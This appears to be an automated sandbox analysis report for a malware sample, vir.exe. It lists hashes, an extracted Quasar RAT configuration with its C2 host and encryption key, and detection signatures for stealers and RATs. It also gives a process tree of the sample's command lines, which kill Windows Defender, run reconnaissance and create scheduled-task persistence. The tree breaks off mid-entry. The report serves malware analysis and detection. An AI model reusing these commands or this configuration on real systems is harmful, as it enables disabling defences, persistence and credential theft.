Resubmissions

17-01-2025 11:40

250117-ns1f3svrfx 10

26-12-2024 15:01

241226-sec6vayjgx 10

27-09-2024 10:28

240927-mh3m1sxgrm 10

18-08-2024 19:49

240818-yjmtqsthkm 10

18-08-2024 14:30

240818-rvdxmsxgjg 10

15-08-2024 23:29

240815-3g3jmawdnq 10

15-08-2024 23:15

240815-28syts1brg 10

Analysis

  • max time kernel
    301s
  • max time network
    310s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-01-2025 11:40

General

  • Target

    vir.exe

  • Size

    336.1MB

  • MD5

    bc82ea785da1180a8a964b3e54ad106c

  • SHA1

    4c1952ce778455af8ed10dca7b9f77d7815e8d0a

  • SHA256

    c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b

  • SHA512

    62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b

  • SSDEEP

    6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Signatures

  • Detect Umbral payload 2 IoCs
  • MassLogger

    Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.

  • MassLogger Main payload 3 IoCs
  • Masslogger family
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Njrat family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 12 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Windows security bypass 2 TTPs 5 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 3 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Manipulates Digital Signatures 1 TTPs 3 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 5 IoCs
  • .NET Reactor proctector 35 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 49 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 2 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Windows security modification 2 TTPs 6 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

  • AutoIT Executable 4 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 29 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 62 IoCs
  • Drops file in Windows directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 17 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 4 IoCs
  • Enumerates system info in registry 2 TTPs 13 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 57 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • NTFS ADS 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 17 IoCs
  • Runs regedit.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 58 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 33 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\vir.exe
    C:\Users\Admin\AppData\Local\Temp\vir.exe sh $MOZILLA/ %SIGINT% "SIGTERM|DESTROY|SIGKILL"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\!main.cmd" "sh" "$MOZILLA/" "%SIGINT%" "SIGTERM|DESTROY|SIGKILL""
      2⤵
      • Loads dropped DLL
      • Checks whether UAC is enabled
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2348
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K spread.cmd
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:632
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 1 C:\Users\Admin\Desktop
          4⤵
          • Enumerates system info in registry
          PID:1836
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 2 C:\Users\Admin\Desktop
          4⤵
          • Enumerates system info in registry
          PID:536
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 3 C:\Users\Admin\
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:1592
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K doxx.cmd
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:620
        • C:\Windows\SysWOW64\ipconfig.exe
          ipconfig
          4⤵
          • Gathers network information
          PID:1248
        • C:\Windows\SysWOW64\net.exe
          net accounts
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:740
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 accounts
            5⤵
              PID:2896
          • C:\Windows\SysWOW64\net.exe
            net user
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:448
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 user
              5⤵
                PID:1504
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist /apps /v /fo table
              4⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2992
          • C:\Windows\SysWOW64\PING.EXE
            ping google.com -t -n 1 -s 4 -4
            3⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1492
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im WindowsDefender.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2400
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K handler.cmd
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2260
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K cipher.cmd
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2380
            • C:\Windows\SysWOW64\cipher.exe
              cipher /e
              4⤵
              • System Location Discovery: System Language Discovery
              PID:668
            • C:\Windows\SysWOW64\cipher.exe
              cipher /e
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3352
            • C:\Windows\SysWOW64\cipher.exe
              cipher /e
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3728
            • C:\Windows\SysWOW64\cipher.exe
              cipher /e
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3816
          • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\Rover.exe
            Rover.exe
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            PID:2132
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\web.htm
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            PID:2860
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2860 CREDAT:275457 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:3000
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2860 CREDAT:406532 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:1844
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2860 CREDAT:209941 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:4092
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2860 CREDAT:209955 /prefetch:2
              4⤵
              • Suspicious use of SetWindowsHookEx
              PID:3328
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2860 CREDAT:603156 /prefetch:2
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:2708
          • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\Google.exe
            Google.exe
            3⤵
            • Executes dropped EXE
            PID:956
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\helper.vbs"
            3⤵
              PID:2252
            • C:\Windows\SysWOW64\PING.EXE
              ping google.com -t -n 1 -s 4 -4
              3⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2220
            • C:\Windows\SysWOW64\PING.EXE
              ping mrbeast.codes -t -n 1 -s 4 -4
              3⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:3196
            • C:\Windows\SysWOW64\xcopy.exe
              xcopy Google.exe C:\Users\Admin\Desktop
              3⤵
              • System Location Discovery: System Language Discovery
              • Enumerates system info in registry
              PID:4044
            • C:\Windows\SysWOW64\xcopy.exe
              xcopy Rover.exe C:\Users\Admin\Desktop
              3⤵
              • Enumerates system info in registry
              PID:4056
            • C:\Windows\SysWOW64\xcopy.exe
              xcopy spinner.gif C:\Users\Admin\Desktop
              3⤵
              • Enumerates system info in registry
              PID:4068
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /K bloatware.cmd
              3⤵
              • Loads dropped DLL
              PID:4080
              • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\bloatware\1.exe
                1.exe
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Program Files directory
                • Modifies registry class
                PID:2792
                • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                  "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:3744
                  • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                    "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{DA901F80-E633-4148-BED2-11C763DF9F96} {FB00F5CC-4082-44CF-80BE-8CD4E60D76E2} 3744
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3304
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c install.bat
                  5⤵
                    PID:1888
                    • C:\Windows\SysWOW64\regsvr32.exe
                      regsvr32 /s "DroidCamFilter32.ax"
                      6⤵
                      • Loads dropped DLL
                      • Modifies registry class
                      PID:832
                    • C:\Windows\SysWOW64\regsvr32.exe
                      regsvr32 /s "DroidCamFilter64.ax"
                      6⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2796
                      • C:\Windows\system32\regsvr32.exe
                        /s "DroidCamFilter64.ax"
                        7⤵
                        • Loads dropped DLL
                        • Modifies registry class
                        PID:2732
                  • C:\Program Files (x86)\DroidCam\lib\insdrv.exe
                    "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a
                    5⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    • Modifies system certificate store
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3848
                • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\bloatware\3.exe
                  3.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Modifies Internet Explorer settings
                  • Modifies registry class
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  PID:2704
                  • C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
                    C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
                    5⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Modifies system certificate store
                    PID:2264
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiR0IiLCJjbGllbnRfdmVyc2lvbiI6IjE3OSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNS0wMS0xN1QxMTo0MzowNy42NTJaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ
                    5⤵
                      PID:2808
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\bloatware\2.hta"
                    4⤵
                    • Blocklisted process makes network request
                    • System Location Discovery: System Language Discovery
                    PID:2388
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /K SilentSetup.cmd
                    4⤵
                    • Loads dropped DLL
                    PID:2836
                    • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
                      WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2912
                      • C:\Users\Admin\AppData\Local\Temp\is-7MVR1.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-7MVR1.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$1030E,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in Program Files directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        PID:2056
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
                          7⤵
                          • System Location Discovery: System Language Discovery
                          PID:1152
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im winaerotweaker.exe /f
                            8⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2276
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
                          7⤵
                          • System Location Discovery: System Language Discovery
                          PID:2448
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im winaerotweakerhelper.exe /f
                            8⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2072
                • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\regmess.exe
                  regmess.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:4088
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_21016d95-8526-4e44-8d9e-f34c644758b6\regmess.bat" "
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2832
                    • C:\Windows\SysWOW64\reg.exe
                      reg import Setup.reg /reg:32
                      5⤵
                        PID:320
                      • C:\Windows\SysWOW64\reg.exe
                        reg import Console.reg /reg:32
                        5⤵
                          PID:1908
                        • C:\Windows\SysWOW64\reg.exe
                          reg import Desktop.reg /reg:32
                          5⤵
                          • Sets desktop wallpaper using registry
                          PID:2872
                        • C:\Windows\SysWOW64\reg.exe
                          reg import International.reg /reg:32
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:2708
                        • C:\Windows\SysWOW64\reg.exe
                          reg import Fonts.reg /reg:32
                          5⤵
                          • System Location Discovery: System Language Discovery
                          • Modifies Internet Explorer settings
                          PID:884
                        • C:\Windows\SysWOW64\reg.exe
                          reg import Cursors.reg /reg:32
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:2772
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 10
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Delays execution with timeout.exe
                      PID:1776
                    • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\scary.exe
                      scary.exe
                      3⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2884
                      • C:\Windows\system32\schtasks.exe
                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                        4⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:1480
                      • C:\Program Files\SubDir\Romilyaa.exe
                        "C:\Program Files\SubDir\Romilyaa.exe"
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        • Suspicious use of SetWindowsHookEx
                        PID:1692
                        • C:\Windows\system32\schtasks.exe
                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                          5⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:3260
                        • C:\Windows\system32\cmd.exe
                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\4yzJw6YZhZ8v.bat" "
                          5⤵
                            PID:2700
                            • C:\Windows\system32\chcp.com
                              chcp 65001
                              6⤵
                                PID:2764
                              • C:\Windows\system32\PING.EXE
                                ping -n 10 localhost
                                6⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:2276
                              • C:\Program Files\SubDir\Romilyaa.exe
                                "C:\Program Files\SubDir\Romilyaa.exe"
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:1836
                                • C:\Windows\system32\schtasks.exe
                                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                  7⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:868
                                • C:\Windows\system32\cmd.exe
                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\QRAnwnjZ7xGQ.bat" "
                                  7⤵
                                    PID:1544
                                    • C:\Windows\system32\chcp.com
                                      chcp 65001
                                      8⤵
                                        PID:3024
                                      • C:\Windows\system32\PING.EXE
                                        ping -n 10 localhost
                                        8⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        • Runs ping.exe
                                        PID:2072
                                      • C:\Program Files\SubDir\Romilyaa.exe
                                        "C:\Program Files\SubDir\Romilyaa.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:2916
                                        • C:\Windows\system32\schtasks.exe
                                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                          9⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2824
                                        • C:\Windows\system32\cmd.exe
                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\3E09nEw6OKRy.bat" "
                                          9⤵
                                            PID:1584
                                            • C:\Windows\system32\chcp.com
                                              chcp 65001
                                              10⤵
                                                PID:4092
                                              • C:\Windows\system32\PING.EXE
                                                ping -n 10 localhost
                                                10⤵
                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                • Runs ping.exe
                                                PID:3240
                                              • C:\Program Files\SubDir\Romilyaa.exe
                                                "C:\Program Files\SubDir\Romilyaa.exe"
                                                10⤵
                                                • Executes dropped EXE
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:2908
                                                • C:\Windows\system32\schtasks.exe
                                                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                  11⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:380
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tZnR3FL31OvT.bat" "
                                                  11⤵
                                                    PID:3444
                                                    • C:\Windows\system32\chcp.com
                                                      chcp 65001
                                                      12⤵
                                                        PID:3360
                                                      • C:\Windows\system32\PING.EXE
                                                        ping -n 10 localhost
                                                        12⤵
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        • Runs ping.exe
                                                        PID:2764
                                                      • C:\Program Files\SubDir\Romilyaa.exe
                                                        "C:\Program Files\SubDir\Romilyaa.exe"
                                                        12⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:2404
                                                        • C:\Windows\system32\schtasks.exe
                                                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                          13⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3632
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\RBBVyGfBClc2.bat" "
                                                          13⤵
                                                            PID:3840
                                                            • C:\Windows\system32\chcp.com
                                                              chcp 65001
                                                              14⤵
                                                                PID:3076
                                                              • C:\Windows\system32\PING.EXE
                                                                ping -n 10 localhost
                                                                14⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:1840
                                                              • C:\Program Files\SubDir\Romilyaa.exe
                                                                "C:\Program Files\SubDir\Romilyaa.exe"
                                                                14⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of FindShellTrayWindow
                                                                • Suspicious use of SendNotifyMessage
                                                                PID:2580
                                                                • C:\Windows\system32\schtasks.exe
                                                                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                  15⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:2600
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\33AxhRm8JDqs.bat" "
                                                                  15⤵
                                                                    PID:2740
                                                                    • C:\Windows\system32\chcp.com
                                                                      chcp 65001
                                                                      16⤵
                                                                        PID:780
                                                                      • C:\Windows\system32\PING.EXE
                                                                        ping -n 10 localhost
                                                                        16⤵
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        • Runs ping.exe
                                                                        PID:1520
                                                                      • C:\Program Files\SubDir\Romilyaa.exe
                                                                        "C:\Program Files\SubDir\Romilyaa.exe"
                                                                        16⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:2392
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                          17⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3236
                                                                        • C:\Windows\system32\cmd.exe
                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\VzwbLuUGPIDk.bat" "
                                                                          17⤵
                                                                            PID:1380
                                                                            • C:\Windows\system32\chcp.com
                                                                              chcp 65001
                                                                              18⤵
                                                                                PID:3492
                                                                              • C:\Windows\system32\PING.EXE
                                                                                ping -n 10 localhost
                                                                                18⤵
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                • Runs ping.exe
                                                                                PID:4080
                                                                              • C:\Program Files\SubDir\Romilyaa.exe
                                                                                "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                18⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:2156
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                  19⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:3636
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\zM0vo3GgfhPd.bat" "
                                                                                  19⤵
                                                                                    PID:3816
                                                                                    • C:\Windows\system32\chcp.com
                                                                                      chcp 65001
